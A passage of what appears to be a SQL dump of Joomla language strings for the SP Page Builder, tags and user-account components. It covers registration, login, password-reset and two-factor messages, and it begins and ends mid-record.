found!','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(602,'COM_SPPAGEBUILDER_ADDON_INSTAGRAM_ERORR','No item found! Please make sure that your <strong>Instagram User ID</strong> and <strong>Access Token</strong> is correct','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(603,'COM_SPPAGEBUILDER_ADDON_INSTAGRAM_REDIRECT','Instagram Redirect Link','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(604,'COM_SPPAGEBUILDER_ADDON_OPTIN_FORM_EMPTY_API','Please insert your API key for','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(605,'COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_PENDING','We need to confirm your email address. To complete the subscription process, please click the link in the email we just sent you.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(606,'COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_CONFIRMED','Your subscription to our list has been confirmed. Thank you for subscribing!','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(607,'COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_UPDATED','Your email was updated successfully.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(608,'COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_EXIST','You are already subscribed.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(609,'COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_ERROR','Some problem occurred, please try again.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(610,'COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_ACYMAILING_NOT_INSTALLED','Please make sure that AcyMailing is installed and activated.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(611,'COM_SPPAGEBUILDER_MEDIA_MANAGER_DELETE_FAILED','Unable to delete','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(612,'COM_SPPB_ADDON_SOCIALSHARE_API_NOT_FOUND','Please Insert your API key to get social count.','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(613,'COM_SPPAGEBUILDER_ARIA_NEXT','Next','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(614,'COM_SPPAGEBUILDER_ARIA_PREVIOUS','Previous','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(615,'COM_SPPAGEBUILDER_ARIA_BUTTON_TEXT','Button','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(616,'COM_SPPAGEBUILDER_ADDON_TABLE_ADVANCED_SEARCH_PLACEHOLDER','Type Here To Search','/home/smthsmth/public_html/language/en-GB/en-GB.com_sppagebuilder.ini'),(617,'COM_TAGS_CREATED_DATE','Created Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(618,'COM_TAGS_DEFAULT_PAGE_TITLE','Tags','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(619,'COM_TAGS_FILTER_SEARCH_DESC','Enter all or part of the title to search for.','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(620,'COM_TAGS_MODIFIED_DATE','Modified Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(621,'COM_TAGS_NO_ITEMS','No matching items were found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(622,'COM_TAGS_NO_TAGS','There are no tags.','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(623,'COM_TAGS_PUBLISHED_DATE','Published Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(624,'COM_TAGS_TAG_NOT_FOUND','Tag not found.','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(625,'COM_TAGS_TITLE_FILTER_LABEL','Enter Part of Title','/home/smthsmth/public_html/language/en-GB/en-GB.com_tags.ini'),(626,'COM_USERS_ACTIVATION_TOKEN_NOT_FOUND','Verification code not found. Check if your account is already activated and try to log in.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(627,'COM_USERS_CAPTCHA_LABEL','Captcha','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(628,'COM_USERS_CAPTCHA_DESC','Please complete the security check.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(629,'COM_USERS_DATABASE_ERROR','Error getting the user from the database: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(630,'COM_USERS_DESIRED_PASSWORD','Enter your desired password.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(631,'COM_USERS_DESIRED_USERNAME','Enter your desired username.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(632,'COM_USERS_EDIT_PROFILE','Edit Profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(633,'COM_USERS_EMAIL_ACCOUNT_DETAILS','Account Details for %s at %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(634,'COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_BODY','Hello administrator,\\n\\nA new user has registered at %s.\\nThe user has verified their email address and requests that you approve their account.\\nThis email has their details:\\n\\n Name : %s \\n email: %s \\n Username: %s \\n\\nYou can activate the user by selecting on the link below:\\n %s \\n','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(635,'COM_USERS_EMAIL_ACTIVATE_WITH_ADMIN_ACTIVATION_SUBJECT','Registration approval required for account of %s at %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(636,'COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_BODY','Hello %s,\\n\\nYour account has been activated by an administrator. You can now login at %s using the username %s and the password you chose while registering.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(637,'COM_USERS_EMAIL_ACTIVATED_BY_ADMIN_ACTIVATION_SUBJECT','Account activated for %s at %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(638,'COM_USERS_EMAIL_PASSWORD_RESET_BODY','Hello,\\n\\nA request has been made to reset your %s account password. To reset your password, you will need to submit this verification code to verify that the request was legitimate.\\n\\nThe verification code is %s\\n\\nSelect the URL below and proceed with resetting your password.\\n\\n %s \\n\\nThank you.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(639,'COM_USERS_EMAIL_PASSWORD_RESET_SUBJECT','Your %s password reset request','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(640,'COM_USERS_EMAIL_REGISTERED_BODY','Hello %s,\\n\\nThank you for registering at %s.\\n\\nYou may now log in to %s using the following username and password:\\n\\nUsername: %s\\nPassword: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(641,'COM_USERS_EMAIL_REGISTERED_BODY_NOPW','Hello %s,\\n\\nThank you for registering at %s.\\n\\nYou may now log in to %s using the username and password you registered with.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(642,'COM_USERS_EMAIL_REGISTERED_NOTIFICATION_TO_ADMIN_BODY','Hello administrator, \\n\\nA new user \'%s\', username \'%s\', has registered at %s.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(643,'COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY','Hello %s,\\n\\nThank you for registering at %s. Your account is created and must be activated before you can use it.\\nTo activate the account select the following link or copy-paste it in your browser:\\n%s \\n\\nAfter activation you may login to %s using the following username and password:\\n\\nUsername: %s\\nPassword: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(644,'COM_USERS_EMAIL_REGISTERED_WITH_ACTIVATION_BODY_NOPW','Hello %s,\\n\\nThank you for registering at %s. Your account is created and must be activated before you can use it.\\nTo activate the account select the following link or copy-paste it in your browser:\\n%s \\n\\nAfter activation you may login to %s using the following username and the password you entered during registration:\\n\\nUsername: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(645,'COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY','Hello %s,\\n\\nThank you for registering at %s. Your account is created and must be verified before you can use it.\\nTo verify the account select the following link or copy-paste it in your browser:\\n %s \\n\\nAfter verification an administrator will be notified to activate your account. You\'ll receive a confirmation when it\'s done.\\nOnce that account has been activated you may login to %s using the following username and password:\\n\\nUsername: %s\\nPassword: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(646,'COM_USERS_EMAIL_REGISTERED_WITH_ADMIN_ACTIVATION_BODY_NOPW','Hello %s,\\n\\nThank you for registering at %s. Your account is created and must be verified before you can use it.\\nTo verify the account select the following link or copy-paste it in your browser:\\n %s \\n\\nAfter verification an administrator will be notified to activate your account. You\'ll receive a confirmation when it\'s done.\\nOnce that account has been activated you may login to %s using the following username and the password you entered during registration:\\n\\nUsername: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(647,'COM_USERS_EMAIL_USERNAME_REMINDER_BODY','Hello,\\n\\nA username reminder has been requested for your %s account.\\n\\nYour username is %s.\\n\\nTo login to your account, select the link below.\\n\\n%s \\n\\nThank you.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(648,'COM_USERS_EMAIL_USERNAME_REMINDER_SUBJECT','Your %s username','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(649,'COM_USERS_ERROR_SECRET_CODE_WITHOUT_TFA','You have entered a Secret Code but two factor authentication is not enabled in your user account. If you want to use a secret code to secure your login please edit your user profile and enable two factor authentication.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(650,'COM_USERS_FIELD_PASSWORD_RESET_DESC','Please enter the email address associated with your User account.<br />A verification code will be sent to you. Once you have received the verification code, you will be able to choose a new password for your account.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(651,'COM_USERS_FIELD_PASSWORD_RESET_LABEL','Email Address','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(652,'COM_USERS_FIELD_REMIND_EMAIL_DESC','Please enter the email address associated with your User account.<br />Your username will be emailed to the email address on file.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(653,'COM_USERS_FIELD_REMIND_EMAIL_LABEL','Email Address','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(654,'COM_USERS_FIELD_RESET_CONFIRM_TOKEN_DESC','Enter the password reset verification code you received by email.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(655,'COM_USERS_FIELD_RESET_CONFIRM_TOKEN_LABEL','Verification Code','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(656,'COM_USERS_FIELD_RESET_CONFIRM_USERNAME_DESC','Enter your username.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(657,'COM_USERS_FIELD_RESET_CONFIRM_USERNAME_LABEL','Username','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(658,'COM_USERS_FIELD_RESET_PASSWORD1_DESC','Enter your new password.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(659,'COM_USERS_FIELD_RESET_PASSWORD1_LABEL','Password','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(660,'COM_USERS_FIELD_RESET_PASSWORD1_MESSAGE','The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(661,'COM_USERS_FIELD_RESET_PASSWORD2_DESC','Confirm your new password.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(662,'COM_USERS_FIELD_RESET_PASSWORD2_LABEL','Confirm Password','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(663,'COM_USERS_INVALID_EMAIL','Invalid email address','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(664,'COM_USERS_LOGIN_DEFAULT_LABEL','User Login','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(665,'COM_USERS_LOGIN_IMAGE_ALT','Login image','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(666,'COM_USERS_LOGIN_REGISTER','Don\'t have an account?','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(667,'COM_USERS_LOGIN_REMEMBER_ME','Remember me','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(668,'COM_USERS_LOGIN_REMIND','Forgot your username?','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(669,'COM_USERS_LOGIN_RESET','Forgot your password?','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(670,'COM_USERS_LOGIN_USERNAME_LABEL','Username','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(671,'COM_USERS_MAIL_FAILED','Failed sending email.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(672,'COM_USERS_MAIL_SEND_FAILURE_BODY','An error was encountered when sending the user registration email. The error is: %s The user who tried to register is: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(673,'COM_USERS_MAIL_SEND_FAILURE_SUBJECT','Error sending email','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(674,'COM_USERS_MSG_NOT_ENOUGH_INTEGERS_N','Password does not have enough digits. At least %s digits are required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(675,'COM_USERS_MSG_NOT_ENOUGH_INTEGERS_N_1','Password does not have enough digits. At least 1 digit is required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(676,'COM_USERS_MSG_NOT_ENOUGH_LOWERCASE_LETTERS_N','Password does not have enough lower case characters. At least %s lower case characters are required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(677,'COM_USERS_MSG_NOT_ENOUGH_LOWERCASE_LETTERS_N_1','Password does not have enough lower case characters. At least 1 lower case character is required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(678,'COM_USERS_MSG_NOT_ENOUGH_SYMBOLS_N','Password does not have enough symbols (such as !@#$). At least %s symbols are required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(679,'COM_USERS_MSG_NOT_ENOUGH_SYMBOLS_N_1','Password does not have enough symbols (such as !@#$). At least 1 symbol is required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(680,'COM_USERS_MSG_NOT_ENOUGH_UPPERCASE_LETTERS_N','Password does not have enough upper case characters. At least %s upper case characters are required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(681,'COM_USERS_MSG_NOT_ENOUGH_UPPERCASE_LETTERS_N_1','Password does not have enough upper case characters. At least 1 upper case character is required.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(682,'COM_USERS_MSG_PASSWORD_TOO_LONG','Password is too long. Passwords must be less than 100 characters.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(683,'COM_USERS_MSG_PASSWORD_TOO_SHORT_N','Password is too short. Passwords must have at least %s characters.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(684,'COM_USERS_MSG_SPACES_IN_PASSWORD','Password must not have spaces.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(685,'COM_USERS_OPTIONAL','(optional)','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(686,'COM_USERS_OR','or','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(687,'COM_USERS_PROFILE','User Profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(688,'COM_USERS_PROFILE_BIND_FAILED','Could not bind profile data: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(689,'COM_USERS_PROFILE_CORE_LEGEND','Profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(690,'COM_USERS_PROFILE_CUSTOM_LEGEND','Custom Profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(691,'COM_USERS_PROFILE_DEFAULT_LABEL','Edit Your Profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(692,'COM_USERS_PROFILE_EMAIL1_DESC','Enter your email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(693,'COM_USERS_PROFILE_EMAIL1_LABEL','Email Address','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(694,'COM_USERS_PROFILE_EMAIL1_MESSAGE','The email address you entered is already in use or invalid. Please enter another email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(695,'COM_USERS_PROFILE_EMAIL2_DESC','Confirm your email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(696,'COM_USERS_PROFILE_EMAIL2_LABEL','Confirm Email Address','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(697,'COM_USERS_PROFILE_EMAIL2_MESSAGE','The email addresses you entered do not match. Please enter your email address in the email address field and confirm your entry by entering it in the confirm email address field.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(698,'COM_USERS_PROFILE_LAST_VISITED_DATE_LABEL','Last Visited Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(699,'COM_USERS_PROFILE_MY_PROFILE','My Profile','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(700,'COM_USERS_PROFILE_NAME_DESC','Enter your full name.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(701,'COM_USERS_PROFILE_NAME_LABEL','Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(702,'COM_USERS_PROFILE_NEVER_VISITED','This is the first time you visit this site','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(703,'COM_USERS_PROFILE_NOCHANGE_USERNAME_DESC','If you want to change your username, please contact a site administrator.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(704,'COM_USERS_PROFILE_OTEPS','One time emergency passwords','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(705,'COM_USERS_PROFILE_OTEPS_DESC','If you do not have access to your two factor authentication device you can use any of the following passwords instead of a regular security code. Each one of these emergency passwords is immediately destroyed upon use. We recommend printing these passwords out and keeping the printout in a safe and accessible location, eg your wallet or a safety deposit box.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(706,'COM_USERS_PROFILE_OTEPS_WAIT_DESC','There are no emergency one time passwords generated in your account. The passwords will be generated automatically and displayed here as soon as you activate two factor authentication.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(707,'COM_USERS_PROFILE_PASSWORD1_LABEL','Password','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(708,'COM_USERS_PROFILE_PASSWORD1_MESSAGE','The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(709,'COM_USERS_PROFILE_PASSWORD2_DESC','Confirm your password.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(710,'COM_USERS_PROFILE_PASSWORD2_LABEL','Confirm Password','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(711,'COM_USERS_PROFILE_REGISTERED_DATE_LABEL','Registered Date','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(712,'COM_USERS_PROFILE_SAVE_FAILED','Profile could not be saved: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(713,'COM_USERS_PROFILE_SAVE_SUCCESS','Profile saved.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(714,'COM_USERS_PROFILE_TWO_FACTOR_AUTH','Two Factor Authentication','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(715,'COM_USERS_PROFILE_TWOFACTOR_LABEL','Authentication Method','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(716,'COM_USERS_PROFILE_TWOFACTOR_DESC','Select the two factor authentication method you want to use.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(717,'COM_USERS_PROFILE_USERNAME_DESC','Enter your desired username.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(718,'COM_USERS_PROFILE_USERNAME_LABEL','Username','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(719,'COM_USERS_PROFILE_USERNAME_MESSAGE','The username you entered is not available. Please pick another username.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(720,'COM_USERS_PROFILE_VALUE_NOT_FOUND','No Information Entered','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(721,'COM_USERS_PROFILE_WELCOME','Welcome, %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(722,'COM_USERS_REGISTER_DEFAULT_LABEL','Create An Account','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(723,'COM_USERS_REGISTER_EMAIL1_DESC','Enter your email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(724,'COM_USERS_REGISTER_EMAIL1_LABEL','Email Address','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(725,'COM_USERS_REGISTER_EMAIL1_MESSAGE','The email address you entered is already in use or invalid. Please enter another email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(726,'COM_USERS_REGISTER_EMAIL2_DESC','Confirm your email address.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(727,'COM_USERS_REGISTER_EMAIL2_LABEL','Confirm Email Address','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(728,'COM_USERS_REGISTER_EMAIL2_MESSAGE','The email addresses you entered do not match. Please enter your email address in the email address field and confirm your entry by entering it in the confirm email address field.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(729,'COM_USERS_REGISTER_NAME_DESC','Enter your full name.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(730,'COM_USERS_REGISTER_NAME_LABEL','Name','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(731,'COM_USERS_REGISTER_PASSWORD1_LABEL','Password','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(732,'COM_USERS_REGISTER_PASSWORD1_MESSAGE','The passwords you entered do not match. Please enter your desired password in the password field and confirm your entry by entering it in the confirm password field.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(733,'COM_USERS_REGISTER_PASSWORD2_DESC','Confirm your password.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(734,'COM_USERS_REGISTER_PASSWORD2_LABEL','Confirm Password','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(735,'COM_USERS_REGISTER_REQUIRED','<strong class=\"red\">*</strong> Required field','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(736,'COM_USERS_REGISTER_USERNAME_DESC','Enter your desired username.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(737,'COM_USERS_REGISTER_USERNAME_LABEL','Username','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(738,'COM_USERS_REGISTER_USERNAME_MESSAGE','The username you entered is not available. Please pick another username.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(739,'COM_USERS_REGISTRATION','User Registration','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(740,'COM_USERS_REGISTRATION_ACL_ADMIN_ACTIVATION','Please log in to confirm that you are authorised to activate new accounts.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(741,'COM_USERS_REGISTRATION_ACL_ADMIN_ACTIVATION_PERMISSIONS','You are not authorised to activate new accounts, please log in with a privileged account.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(742,'COM_USERS_REGISTRATION_ACTIVATE_SUCCESS','Your Account has been activated. You can now log in using the username and password you chose during the registration.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(743,'COM_USERS_REGISTRATION_ACTIVATION_NOTIFY_SEND_MAIL_FAILED','An error was encountered while sending activation notification email','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(744,'COM_USERS_REGISTRATION_ACTIVATION_SAVE_FAILED','Failed to save activation data: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(745,'COM_USERS_REGISTRATION_ADMINACTIVATE_SUCCESS','The user\'s account has been activated and the user has been notified about it.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(746,'COM_USERS_REGISTRATION_BIND_FAILED','Failed to bind registration data: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(747,'COM_USERS_REGISTRATION_COMPLETE_ACTIVATE','Your account has been created and an activation link has been sent to the email address you entered. Note that you must activate the account by selecting the activation link when you get the email before you can login.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(748,'COM_USERS_REGISTRATION_COMPLETE_VERIFY','Your account has been created and a verification link has been sent to the email address you entered. Note that you must verify the account by selecting the verification link when you get the email and then an administrator will activate your account before you can login.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(749,'COM_USERS_REGISTRATION_DEFAULT_LABEL','User Registration','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(750,'COM_USERS_REGISTRATION_SAVE_FAILED','Registration failed: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(751,'COM_USERS_REGISTRATION_SAVE_SUCCESS','Thank you for registering. You may now log in using the username and password you registered with.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(752,'COM_USERS_REGISTRATION_SEND_MAIL_FAILED','An error was encountered while sending the registration email. A message has been sent to the administrator of this site.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(753,'COM_USERS_REGISTRATION_VERIFY_SUCCESS','Your email address has been verified. Once an administrator approves your account you will be notified by email and you can login to the site.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(754,'COM_USERS_REMIND','Reminder','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(755,'COM_USERS_REMIND_DEFAULT_LABEL','Please enter the email address associated with your User account. Your username will be emailed to the email address on file.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(756,'COM_USERS_REMIND_EMAIL_LABEL','Your Email','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(757,'COM_USERS_REMIND_LIMIT_ERROR_N_HOURS','You have exceeded the maximum number of password resets allowed. Please try again in %s hours.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(758,'COM_USERS_REMIND_LIMIT_ERROR_N_HOURS_1','You have exceeded the maximum number of password resets allowed. Please try again in one hour.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(759,'COM_USERS_REMIND_REQUEST_ERROR','Error requesting password reminder.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(760,'COM_USERS_REMIND_REQUEST_FAILED','Reminder failed: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(761,'COM_USERS_REMIND_REQUEST_SUCCESS','Reminder sent. Please check your mail.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(762,'COM_USERS_REMIND_SUPERADMIN_ERROR','A Super User can\'t request a password reminder. Please contact another Super User or use an alternative method.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(763,'COM_USERS_RESET','Password Reset','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(764,'COM_USERS_RESET_COMPLETE_ERROR','Error completing password reset.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(765,'COM_USERS_RESET_COMPLETE_FAILED','Completing reset password failed: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(766,'COM_USERS_RESET_COMPLETE_LABEL','To complete the password reset process, please enter a new password.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(767,'COM_USERS_RESET_COMPLETE_SUCCESS','Reset password successful. You may now login to the site.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(768,'COM_USERS_RESET_CONFIRM_ERROR','Error while confirming the password.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(769,'COM_USERS_RESET_CONFIRM_FAILED','Your password reset confirmation failed because the verification code was invalid. %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(770,'COM_USERS_RESET_CONFIRM_LABEL','An email has been sent to your email address. The email has a verification code, please paste the verification code in the field below to prove that you are the owner of this account.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(771,'COM_USERS_RESET_COMPLETE_TOKENS_MISSING','Your password reset confirmation failed because the verification code was missing.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(772,'COM_USERS_RESET_REQUEST_ERROR','Error requesting password reset.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(773,'COM_USERS_RESET_REQUEST_FAILED','Reset password failed: %s','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(774,'COM_USERS_RESET_REQUEST_LABEL','Please enter the email address for your account. A verification code will be sent to you. Once you have received the verification code, you will be able to choose a new password for your account.','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(775,'COM_USERS_SETTINGS_FIELDSET_LABEL','Basic Settings','/home/smthsmth/public_html/language/en-GB/en-GB.com_users.ini'),(776,'COM_USERS_USER_BLOCKED','This user is blocked. If this is an error, please contact an 